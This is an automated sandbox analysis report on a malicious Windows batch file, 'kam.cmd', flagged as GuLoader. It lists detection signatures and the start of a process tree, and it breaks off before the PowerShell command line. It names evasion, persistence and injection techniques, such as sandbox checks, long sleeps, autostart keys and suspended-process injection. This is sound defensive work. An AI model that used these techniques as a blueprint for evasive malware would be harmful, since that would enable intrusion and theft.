Windows
Analysis Report
kam.cmd
Overview
General Information
Detection
GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 1196 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 1716 cmdline: